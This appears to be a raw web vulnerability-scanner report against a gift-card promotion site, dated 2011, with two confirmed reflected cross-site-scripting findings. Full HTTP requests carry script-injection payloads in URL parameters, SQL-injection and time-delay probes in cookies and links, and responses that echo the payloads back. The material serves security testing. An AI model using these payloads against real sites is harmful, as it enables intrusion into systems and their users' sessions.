</td>
</tr>
</table>

</div>
</div>

<!-- Content Begins -->
<div id="content">
<table width="95%" border="0" cellspacing="0" cellpadding="5" align="center">


</table>
<div>


<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td align="left" width="40%" valign="top">
<div id="blue_previousbutton1">
<span id="ic_link_previous_1">
<a href="/ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0000AB)</script>&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" style="width: 134px; height: 75px;" border="0"></a>
</span>
</div>
</td>
<td align="right" valign="top">
<table width="100%" border="0"><tr><td width=360 NOWRAP><span class="buttontxt" id="buttontxt1" >After You've Completed 2 Offers</span></td><td>
<div id="blue_nextbutton1">
<a href="/ups.htm?path=p.prize.prepop-reg-int-ic_3group_group1&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0000AB)</script>&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" border="0" style="width: 207px; height: 88px;"></a>
</div>
</td>
</tr>
</table>




</td>
</tr>
</table>



</div>
<br><br>
<br><br>


<!-- DISCLAIMER START -->
<div id="disclaimer_container">
<p>
<!--BeginField:Disclaimer-->
You are required to complete at least 2 Silver, 2 Gold and 2 Platinum Sponsor Offer(s) above and must satisfy all <a href="info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Program Requirements</a> to qualify for your gift including: not cancelling your participation in more than a total of 2 Sponsor Offers within 30 days of the Sponsor Offer Initial Transaction Date (the Cancellation Limitation). Promotion <a href="info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms and Conditions</a> prevail over Sponsor Offer terms and conditions. Limit one gift per household per year.
<br/><br/>
For credit card offers, you must activate your card by making a purchase, transferring a balance, or making cash advance; for satellite tv offers you must have the product installed.
<br/><br/>
We are not endorsed, sponsored by or affiliated with above trademarks, or any other merchants listed above. Such terms are registered trademarks of their respective owners.
<!--EndField:Disclaimer-->
</p>
<p align="center">
<!--BeginField:Links--><A HREF="/redeem.htm?promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/redeem.htm?promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Gift Redemption</A> - <A HREF="/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">FAQ</a> - <A HREF="/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes ,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=450');return false;make_x_win=0;">Privacy Policy</A> - <A HREF="/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms &amp; Conditions</A> - <A HREF="/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Unsubscribe</A> - <A HREF="/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Contact Us</A><!--EndField:Links-->
</p>
<p align="center">
<!--BeginField:Copyright-->
Copyright &copy; 2009 Your-gift-zone. All rights reserved.
<!--EndField:Copyright-->
</p>
</div>
<!-- DISCLAIMER END -->





</div>
<!-- Content ENDS -->



</BODY>
</html>



- /ups.htm

/ups.htm CONFIRMED

http://your-gift-zone.com/ups.htm?path='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001AB)..

Parameters

Parameter Type Value
path GET '"--></style></script><script>alert(0x0001AB)</script>
user_pin_id GET 200492244
pin_key GET 706853
user_ref_id GET 90563525
gift GET 29617
user_gift_id GET 332549389
promotion_id GET 2192
promo_name GET 2192name
catalog_id GET 13200
ups_ref GET cg
remoteRef GET 3_4_0_5068_0
sendroikwd GET 3
return_url GET 3
tmp_sequence GET 6924-11079-6839-10131-6166-10237-10231-10284-10233-10292
page_list GET li_sr_sm
short_ic_path GET 3
SID GET f05c7ce946bc38d8bfa6b839a4d56265

Request

GET /ups.htm?path='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AB)%3C/script%3E&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3&SID=f05c7ce946bc38d8bfa6b839a4d56265 HTTP/1.1
Referer: http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=&ups_ref=cg&sendroikwd=&raf_ad_id=&remoteRef=3_4_0_5068_0&return_url=&short_ic_path=&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: CHAR(101)=; CHAR(109)=; CHAR(97))=; 0x3a=; CHAR(97)))=; TlM3NzU0NTYxNDQ2NTc1=; 2))--=; 1=; 1))=; 0)>255)=; 0)=1; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMTM2KTwvc2NyaXB0Pg==; 0)>0--=; 0)<255--=; 0)>255--=; 0)>25--=; 0)>0=; 0)<255=; 0)>255=; 0)>25=
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 15:05:14 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db830aae5f8496x;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie=2192name;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_user_pin_id=200492244;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_pin_key=706853;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_email_key=063756462f49f8c46ec5bc4e60bb02b1;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Your-gift-zone</title>
<link rel="stylesheet" href="http://i.pcp001.com/t/9533/regpath3_03.css" type="text/css" media="all">
<link rel="stylesheet" href="http://i.pcp001.com/t/9673/red4.css" type="text/css" media="all">
<style>

#ic_link_previous_1 {
display:none
}
.justcenter_1{
text-align: center;
}

.justcenter_2{
float: right;
}

.justcenter_3{
float: right;
}




div.spacer{
height:40px;
*height:60px;
font-size:40px;
*font-size:60px;
}



#details {
display:none;
position:absolute;
background-color:#FFF;
width:300px;
z-index:2;
padding:5px 10px 10px 10px;
border:1px solid #000;
font-size:12px;
color:#000000;
text-align:left;
font-family: Arial, Helvetica, sans-serif;
font-weight:normal;
text-decoration:none;
}

#details a {
color:#0000FF;
}
</style>

<script language="javascript">
function showD(id) {
document.getElementById(id).style.display = "block";
}
function hideD(id) {
document.getElementById(id).style.display = "none";
}
</script>

<SCRIPT>
var x_cmd=1;

function x_win(){
if(x_cmd==1){
x_win=window.open('/ups.htm?path='"--></style></script><script>netsparker(0x0001AB)</script>&mode=exit&exit_num=&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&SID=f05c7ce946bc38d8bfa6b839a4d56265','_blank','top=0,left=0,screenX=0,screenY=0,scrollbars,width=550,height=500');x_win.focus();
}
}

function changeFontSize()
{
return;
var text = document.getElementById("phrase").innerHTML;
var fontSize = -1.75 * (parseInt(text.length)) + 90;
document.getElementById("phrase").style.fontSize = fontSize + 'px';
return;
}


</SCRIPT>
</head>

<BODY onLoad="changeFontSize();" onUnLoad="x_win();" >
<div id="hdrContentOffers">
<div id="header">
<div id="hdtop">
<table width="750" height="100%"><tr><td class="mainHdr">
Receive Your FREE $250 in McDonald's&reg; Arch Cards&trade;.
</td></tr></table>
</div>






<div id="hdbot">
<div id="stepArea3"><span class="fillout">Congratulations</span></div>
</div>
</div>

<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div id="guest-cardarea">


<table width="790" border="0" cellpadding="8" cellspacing="8">
<tr>
<td width="250">

<span class="gifttitle">$250 in McDonald's&reg; Arch Cards&trade;</span> <br />
<span style="margin-left: 30px;"><img src="http://i.pcp001.com/g/archcard1_165x150.gif" alt=""></span></td>
<td width="370" valign="top">
<div class="spacer15">&nbsp;</div>
<div class="spacer15">&nbsp;</div>
<img src="http://i.pcp001.com/t/9794/shiptitle-box.jpg" width="174" height="29" />
<div style="margin-left: 30px;">
<p></p>
<span class="font11">You will have a chance to confirm<br />
your address prior to shipping.</span>
</div>
</td>

<td width="150" valign="top"><br />
<span class="font11">
Congratulations, ! To qualify for your free $250 in McDonald's&reg; Arch Cards&trade;, start by completing any 2 of the Silver offers listed below!</span>





</td>
</tr>
</table>

</div>
</div>

<!-- Content Begins -->
<div id="content">
<table width="95%" border="0" cellspacing="0" cellpadding="5" align="center">


</table>
<div>


<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td align="left" width="40%" valign="top">
<div id="blue_previousbutton1">
<span id="ic_link_previous_1">
<a href="/ups.htm?path='"-&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3"&SID=f05c7ce946bc38d8bfa6b839a4d56265 onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" style="width: 134px; height: 75px;" border="0"></a>
</span>
</div>
</td>
<td align="right" valign="top">
<table width="100%" border="0"><tr><td width=360 NOWRAP><span class="buttontxt" id="buttontxt1" >After You've Completed 2 Offers</span></td><td>
<div id="blue_nextbutton1">
<a href="/ups.htm?path='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001AB)</script>-ic_3group_group1&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" border="0" style="width: 207px; height: 88px;"></a>
</div>
</td>
</tr>
</table>




</td>
</tr>
</table>



</div>
<br><br>
<br><br>


<!-- DISCLAIMER START -->
<div id="disclaimer_container">
<p>
<!--BeginField:Disclaimer-->
You are required to complete at least 2 Silver, 2 Gold and 2 Platinum Sponsor Offer(s) above and must satisfy all <a href="info.htm?tp=tos&promo_name=2192name&catalog_id=(select sleep(25))a-- 1&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&catalog_id=(select sleep(25))a-- 1&gift=29617#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Program Requirements</a> to qualify for your gift including: not cancelling your participation in more than a total of 2 Sponsor Offers within 30 days of the Sponsor Offer Initial Transaction Date (the Cancellation Limitation). Promotion <a href="info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=(select sleep(25))a-- 1&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=(select sleep(25))a-- 1#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms and Conditions</a> prevail over Sponsor Offer terms and conditions. Limit one gift per household per year.
<br/><br/>
For credit card offers, you must activate your card by making a purchase, transferring a balance, or making cash advance; for satellite tv offers you must have the product installed.
<br/><br/>
We are not endorsed, sponsored by or affiliated with above trademarks, or any other merchants listed above. Such terms are registered trademarks of their respective owners.
<!--EndField:Disclaimer-->
</p>
<p align="center">
<!--BeginField:Links--><A HREF="/redeem.htm?promo_name=2192name&catalog_id=(select sleep(25))a-- 1&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/redeem.htm?promo_name=2192name&catalog_id=(select sleep(25))a-- 1&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Gift Redemption</A> - <A HREF="/info.htm?tp=faq&promo_name=2192name&catalog_id=(select sleep(25))a-- 1&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=faq&promo_name=2192name&catalog_id=(select sleep(25))a-- 1&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">FAQ</a> - <A HREF="/info.htm?tp=privacy&promo_name=2192name&catalog_id=(select sleep(25))a-- 1&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=privacy&promo_name=2192name&catalog_id=(select sleep(25))a-- 1&gift=29617','_blank','resizable=yes ,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=450');return false;make_x_win=0;">Privacy Policy</A> - <A HREF="/info.htm?tp=tos&promo_name=2192name&catalog_id=(select sleep(25))a-- 1&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=tos&promo_name=2192name&catalog_id=(select sleep(25))a-- 1&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms &amp; Conditions</A> - <A HREF="/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=(select sleep(25))a-- 1&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=(select sleep(25))a-- 1&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Unsubscribe</A> - <A HREF="/info.htm?tp=con&promo_name=2192name&catalog_id=(select sleep(25))a-- 1&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=con&promo_name=2192name&catalog_id=(select sleep(25))a-- 1&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Contact Us</A><!--EndField:Links-->
</p>
<p align="center">
<!--BeginField:Copyright-->
Copyright &copy; 2009 Your-gift-zone. All rights reserved.
<!--EndField:Copyright-->
</p>
</div>
<!-- DISCLAIMER END -->





</div>
<!-- Content ENDS -->



</BODY>
</html>



- /ups.htm

/ups.htm CONFIRMED

http://your-gift-zone.com/ups.htm?path=p.prize.prepop-reg&user_pin_id=%22%3E%3Cscript%3Ealert(9)%3C/..

Parameters

Parameter Type Value
path GET p.prize.prepop-reg
user_pin_id GET "><script>alert(9)</script>
pin_key GET 706853
user_ref_id GET 90563525
gift GET 29617
user_gift_id GET 332549389
promotion_id GET 2192
promo_name GET 2192name
catalog_id GET 13200
ups_ref GET cg
remoteRef GET 3_4_0_5068_0
sendroikwd GET 3
return_url GET 3
tmp_sequence GET 6924-11079-6839-10131-6166-10237-10231-10284-10233-10292
page_list GET li_sr_sm
short_ic_path GET 3
SID GET f05c7ce946bc38d8bfa6b839a4d56265

Request

GET /ups.htm?path=p.prize.prepop-reg&user_pin_id=%22%3E%3Cscript%3Enetsparker(9)%3C/script%3E&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3&SID=f05c7ce946bc38d8bfa6b839a4d56265 HTTP/1.1
Referer: http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=&ups_ref=cg&sendroikwd=&raf_ad_id=&remoteRef=3_4_0_5068_0&return_url=&short_ic_path=&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: CHAR(109)=; CHAR(97))=; 0x3a=; CHAR(97)))=; TlM3NzU0NTYxNDQ2NTc1=; 2))--=; 1=; 1))=; 0)>255)=; 0)=1; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMTM2KTwvc2NyaXB0Pg==; 0)>0--=; 0)<255--=; 0)>255--=; 0)>25--=; 0)>0=; 0)<255=; 0)>255=; 0)>25=; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMUFGKTwvc2NyaXB0Pg==
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 15:05:28 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db830b83ac4f4c4;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie=2192name;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_user_pin_id="><script>netsparker(9)</script>;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_pin_key=706853;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_email_key=063756462f49f8c46ec5bc4e60bb02b1;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Your-gift-zone</title>
<link rel="stylesheet" href="http://i.pcp001.com/t/9533/regpath3_03.css" type="text/css" media="all">
<link rel="stylesheet" href="http://i.pcp001.com/t/9673/red4.css" type="text/css" media="all">
<style>

#ic_link_previous_1 {
display:none
}
.justcenter_1{
text-align: center;
}

.justcenter_2{
float: right;
}

.justcenter_3{
float: right;
}




div.spacer{
height:40px;
*height:60px;
font-size:40px;
*font-size:60px;
}



#details {
display:none;
position:absolute;
background-color:#FFF;
width:300px;
z-index:2;
padding:5px 10px 10px 10px;
border:1px solid #000;
font-size:12px;
color:#000000;
text-align:left;
font-family: Arial, Helvetica, sans-serif;
font-weight:normal;
text-decoration:none;
}

#details a {
color:#0000FF;
}
</style>

<script language="javascript">
function showD(id) {
document.getElementById(id).style.display = "block";
}
function hideD(id) {
document.getElementById(id).style.display = "none";
}
</script>

<SCRIPT>
var x_cmd=1;

function x_win(){
if(x_cmd==1){
x_win=window.open('/ups.htm?path=p.prize.prepop-reg&mode=exit&exit_num=&user_pin_id="><script>netsparker(9)</script>&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&SID=f05c7ce946bc38d8bfa6b839a4d56265','_blank','top=0,left=0,screenX=0,screenY=0,scrollbars,width=550,height=500');x_win.focus();
}
}

function changeFontSize()
{
return;
var text = document.getElementById("phrase").innerHTML;
var fontSize = -1.75 * (parseInt(text.length)) + 90;
document.getElementById("phrase").style.fontSize = fontSize + 'px';
return;
}


</SCRIPT>
</head>

<BODY onLoad="changeFontSize();" onUnLoad="x_win();" >
<div id="hdrContentOffers">
<div id="header">
<div id="hdtop">
<table width="750" height="100%"><tr><td class="mainHdr">
Receive Your FREE $50 Gift Card.
</td></tr></table>
</div>






<div id="hdbot">
<div id="stepArea3"><span class="fillout">Congratulations</span></div>
</div>
</div>

<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div id="guest-cardarea">


<table width="790" border="0" cellpadding="8" cellspacing="8">
<tr>
<td width="250">

<span class="gifttitle"> $50 Gift Card</span> <br />
<span style="margin-left: 30px;"><img src="http://www.theuseful.com/media/freegiftcard_reserved_287x180.gif" width="200" height="126"></span></td>
<td width="370" valign="top">
<div class="spacer15">&nbsp;</div>
<div class="spacer15">&nbsp;</div>
<img src="http://i.pcp001.com/t/9794/shiptitle-box.jpg" width="174" height="29" />
<div style="margin-left: 30px;">
<p></p>
<span class="font11">You will have a chance to confirm<br />
your address prior to shipping.</span>
</div>
</td>

<td width="150" valign="top"><br />
<span class="font11">
Congratulations, ! To qualify for your free $50 Gift Card, start by completing any 6 of the offers listed below!</span>





</td>
</tr>
</table>

</div>
</div>

<!-- Content Begins -->
<div id="content">
<table width="95%" border="0" cellspacing="0" cellpadding="5" align="center">


</table>
<div>


<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td align="left" width="40%" valign="top">
<div id="blue_previousbutton1">
<span id="ic_link_previous_1">
<a href="/ups.htm?path=p.prize.prepop-reg&user_pin_id=&SID=f05c7ce946bc38d8bfa6b839a4d56265"><script>netsparker(9)</script>&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" style="width: 134px; height: 75px;" border="0"></a>
</span>
</div>
</td>
<td align="right" valign="top">
<table width="100%" border="0"><tr><td width=360 NOWRAP><span class="buttontxt" id="buttontxt1" >After You've Completed 6 Offers</span></td><td>
<div id="blue_nextbutton1">
<a href="/ups.htm?path=p.prize.prepop-reg&user_pin_id=&SID=f05c7ce946bc38d8bfa6b839a4d56265"><script>netsparker(9)</script>&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" target="_blank" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" border="0" style="width: 207px; height: 88px;"></a>
</div>
</td>
</tr>
</table>




</td>
</tr>
</table>



</div>
<br><br>
<br><br>


<!-- DISCLAIMER START -->
<div id="disclaimer_container">
<p>
<!--BeginField:Disclaimer-->
You are required to complete at least 2 Silver, 2 Gold and 2 Platinum Sponsor Offer(s) above and must satisfy all <a href="info.htm?tp=tos&promo_name=2192name&catalog_id=(select sleep(25))a-- 1&gift=71&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&catalog_id=(select sleep(25))a-- 1&gift=71#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Program Requirements</a> to qualify for your gift including: not cancelling your participation in more than a total of 2 Sponsor Offers within 30 days of the Sponsor Offer Initial Transaction Date (the Cancellation Limitation). Promotion <a href="info.htm?tp=tos&promo_name=2192name&gift=71&catalog_id=(select sleep(25))a-- 1&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&gift=71&catalog_id=(select sleep(25))a-- 1#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms and Conditions</a> prevail over Sponsor Offer terms and conditions. Limit one gift per household per year.
<br/><br/>
For credit card offers, you must activate your card by making a purchase, transferring a balance, or making cash advance; for satellite tv offers you must have the product installed.
<br/><br/>
We are not endorsed, sponsored by or affiliated with above trademarks, or any other merchants listed above. Such terms are registered trademarks of their respective owners.
<!--EndField:Disclaimer-->
</p>
<p align="center">
